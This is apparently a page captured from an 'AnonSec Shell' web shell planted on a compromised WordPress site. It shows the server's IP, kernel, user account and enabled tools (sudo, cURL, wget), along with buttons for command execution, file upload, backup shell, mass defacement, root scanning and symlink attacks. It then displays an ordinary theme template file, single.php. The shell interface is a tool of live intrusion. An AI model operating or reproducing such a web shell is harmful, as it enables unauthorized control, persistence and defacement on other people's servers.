AnonSec Shell
Server IP : 198.244.165.102  /  Your IP : 216.73.216.218   [ Reverse IP ]
Web Server : nginx/1.24.0
System : Linux modovh-ub-01 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : colleary ( 1011)
PHP Version : 8.3.23
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/colleary/public_html/wp-content/themes/realhomes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/colleary/public_html/wp-content/themes/realhomes/single.php
<?php
get_header();
?>

        <!-- Page Head -->
        <?php get_template_part("banners/blog_page_banner"); ?>

        <!-- Content -->
        <div class="container contents single">
            <div class="row">
                <div class="span9 main-wrap">
                    <!-- Main Content -->
                    <div class="main">

                        <div class="inner-wrapper">
                            <?php
                            if ( have_posts() ) :
                                while ( have_posts() ) :
                                    the_post();

                                    $format = get_post_format();
                                    if( false === $format ) { $format = 'standard'; }

                                    ?>
                                    <article  <?php post_class(); ?>>
                                            <header>
                                                <h3 class="post-title"><?php the_title(); ?></h3>
                                                <div class="post-meta <?php echo esc_attr( $format ); ?>-meta thumb-<?php echo has_post_thumbnail()?'exist':'not-exist'; ?>">
                                                    <span> <?php _e('Posted on', 'framework'); ?>  <span class="date"> <?php the_time('F d, Y'); ?> </span></span>
                                                    <span> <?php _e('by', 'framework'); ?> <?php the_author(); ?> <?php _e('in', 'framework'); ?>  <?php the_category(', '); ?>  </span>
                                                </div>
                                            </header>
                                            <?php
                                            get_template_part( 'post-formats/' . $format );
                                            the_content();
                                            ?>
                                    </article>
                                    <?php

                                    wp_link_pages(array('before' => '<div class="pages-nav clearfix">', 'after' => '</div>', 'next_or_number' => 'next'));

                                endwhile;
                                comments_template();
                            endif;
                            ?>
                        </div>

                    </div><!-- End Main Content -->

                </div> <!-- End span9 -->

                <?php get_sidebar(); ?>

            </div><!-- End contents row -->

        </div><!-- End Content -->

<?php get_footer(); ?>

Anon7 - 2022
AnonSec Team